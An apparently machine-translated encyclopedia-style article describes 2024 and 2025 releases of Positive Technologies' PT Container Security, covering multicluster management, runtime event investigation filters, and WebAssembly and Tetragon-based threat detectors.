PT Container Security

Main article: Security Information and Event Management (SIEM)

2025: PT Container Security 0.7 with separate runtime event page

Positive Technologies on June 10, 2025 released an updated version of the product for protecting container environments - PT Container Security 0.7. The main thing in the release is multiclustering, support for protecting all clusters in the infrastructure from a single management point.

PT Container Security now allows you to deploy all security agents - runtime monitoring, image scanning, admission controller, configuration scanning - to protected clusters throughout your client infrastructure. This makes it possible to centralize container security control, reduce the response time to container security incidents, and significantly improve the ease of investigation and post-analysis of incidents by SOC and IT monitoring departments.

PT Container Security's multiclustering architecture allows SOC engineers and analysts to:

• connect only the necessary security sensors in each child cluster and thus save computing resources;
• Use external queue managers, configuration DBMSs, and event storage, reducing resource consumption and network infrastructure costs for collecting and processing large event streams.
• use a common authentication mechanism for all clusters to control access to sensitive information processed in the system.

Our approach to organizing the process of processing data from sensors and microservice architecture allow us to build an optimal security infrastructure for multicluster containerization environments, in which the user will receive the best ratio of consumed resources to the amount of processed flow of security events, "said Mikhail Bessarab, Product Manager of PT Container Security.

As part of version 0.7, PT Container Security received a number of functions.

1. Opportunities have emerged to make it easier for SOC analysts to investigate runtime incidents. A separate page of the runtime event has been added, which displays all information about the parent and brothers of the process.
2. The functionality of transmitting a link to an event registered by sensors in notification for prompt notification of response commands is implemented.
3. The engine for finding anomalies has been optimized, which has improved the performance of processing large streams of events: in case of an error in one of the rules, the threat detection pipeline does not stop, but continues for all other rules.

In addition, for the convenience of deployment engineers, this release has a graphical step-by-step installer that allows you to conveniently configure the PT Container Security installation script to connect additional clusters in minutes.

2024: Opportunities to search for runtime events and conduct incident investigations

Positive Technologies has released an updated version of PT Container Security, a product to protect container environments. The main thing in the release is the ability to search for runtime events and investigate incidents, improve performance by updating the WebAssembly (Wazero) runtime, runtime detectors developed based on tests on the Standoff cyber polygone, as well as an updated version of Tetragon, containing a number of improvements to the runtime monitoring engine. The company announced this on September 30, 2024.

According to field tests, PT Container Security is capable of processing a stream of tens of thousands of events per second or higher. The product supports large high-load production clusters without losing speed, that is, it can ensure the security of infrastructure of any size. As the load increases, PT Container Security can scale horizontally, increasing the number of replicas, or vertically, adding computing resources. Additional performance improvements have been achieved with the latest versions of WebAssembly and Tetragon.

WebAssembly technology allows you to develop detection modules in general-purpose programming languages ​ ​ and implement any arbitrarily complex detection logic in the form of a portable and cross-platform byte code. Using the latest versions of the Wazero runtime, which since release 1.7 has implemented an optimizing compiler, has accelerated each individual detector by 30-35% without changing the source code. Tetragon is used in PT CS to detect threats in runtime starting with the first commercial version of the product.

PT Container Security is based on the most current technologies. With the help of scaling, our development team is guaranteed to ensure stable operation of the solution under high loads and with the maximum possible speed, - said Nikita Ladoshkin, Development Manager of PT Container Security at Positive Technologies.

As part of the update, PT Container Security received new capabilities that make it easier for analysts to investigate incidents in runtime:

• Context filters. Allow you to quickly find events related to the operation of child and parent processes, for example, an attacker runs malicious utilities in a compromised container. Built on observations and analysis of real investigations, help to build a chain of actions of attackers.
• Conventional filters. Help focus on important events, such as events related to a particular pod Kubernetes in or related to specific executables. files
• Presets for frequent checks, raw event formatting and fast filters help information security specialists investigate cyber incidents in containers faster. Allow you not to lose information and quickly return to any point of investigation.
• Detectors developed with the PT Expert Security Center. Due to maximum flexibility, detectors do not require additional tuning, combine signature and behavioral approaches to detecting threats in runtime, offering a hybrid option that combines the strengths of detection methods. The set of detectors is constantly replenished.